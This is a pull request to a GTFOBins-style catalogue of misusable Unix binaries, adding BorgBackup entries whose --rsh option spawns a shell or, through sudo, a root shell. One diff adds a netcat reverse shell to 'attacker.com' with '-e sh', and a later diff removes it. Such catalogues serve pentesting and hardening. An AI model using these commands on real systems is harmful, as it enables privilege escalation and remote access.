### PR TITLE
Added BorgBackup (borg) shell and sudo functions

### DIFF
--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -1,7 +1,7 @@
 ---
 functions:
   shell:
-    - code: aa-exec /bin/sh
+    - code: borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
   sudo:
     - code: sudo aa-exec /bin/sh
 ---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -1,7 +1,8 @@
 ---
 functions:
   shell:
-    - code: borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
+    - code: >
+          borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
   sudo:
     - code: sudo aa-exec /bin/sh
 ---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -4,5 +4,6 @@ functions:
     - code: >
           borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
   sudo:
-    - code: sudo aa-exec /bin/sh
+    - code: >
+          sudo borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
 ---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -1,6 +1,7 @@
 ---
+functions:
   shell:
-      code: borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
+    - code: borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
   sudo:
-      code: sudo borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
+    - code: sudo borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
 ---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -1,7 +1,9 @@
 ---
 functions:
   shell:
-    - code: borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
+    - code: aa-exec /bin/sh
+  suid:
+    - code: ./aa-exec /bin/sh -p
   sudo:
-    - code: sudo borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
+    - code: sudo aa-exec /bin/sh
 ---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -1,0 +1,9 @@
+---
+  sudo:
+    - description: Run `nc -l -p 12345` on the attacker box to receive the shell. 
+      code: |
+        RHOST=attacker.com
+        RPORT=12345
+        NETCAT=/usr/bin/nc
+        sudo borg extract .@.:/::.  --rsh "$NETCAT $RHOST $LHOST -e sh"
+---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -2,8 +2,6 @@
 functions:
   shell:
     - code: aa-exec /bin/sh
-  suid:
-    - code: ./aa-exec /bin/sh -p
   sudo:
     - code: sudo aa-exec /bin/sh
 ---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -1,9 +1,6 @@
 ---
+  shell:
+      code: borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
   sudo:
-    - description: Run `nc -lvnp 12345` on the attacker box to receive the shell. 
-      code: |
-        RHOST=attacker.com
-        RPORT=12345
-        NETCAT=/usr/bin/nc
-        sudo borg extract .@.:/::.  --rsh "$NETCAT $RHOST $LHOST -e sh"
+      code: sudo borg extract @:/:::  --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
 ---

--- a/_gtfobins/borg.md
+++ b/_gtfobins/borg.md
@@ -1,6 +1,6 @@
 ---
   sudo:
-    - description: Run `nc -l -p 12345` on the attacker box to receive the shell. 
+    - description: Run `nc -lvnp 12345` on the attacker box to receive the shell. 
       code: |
         RHOST=attacker.com
         RPORT=12345


### PR DESCRIPTION
BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.

The techniques shown in this PR leverages Borg's `--rsh` argument. When set, the argument's value is used instead of `ssh`. This can be used to specify ssh options, such as a custom identity file `ssh -i /path/to/private/key`.

The techniques shown spawn an `sh` shell instead:
`sudo borg extract @:/::: --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'" `
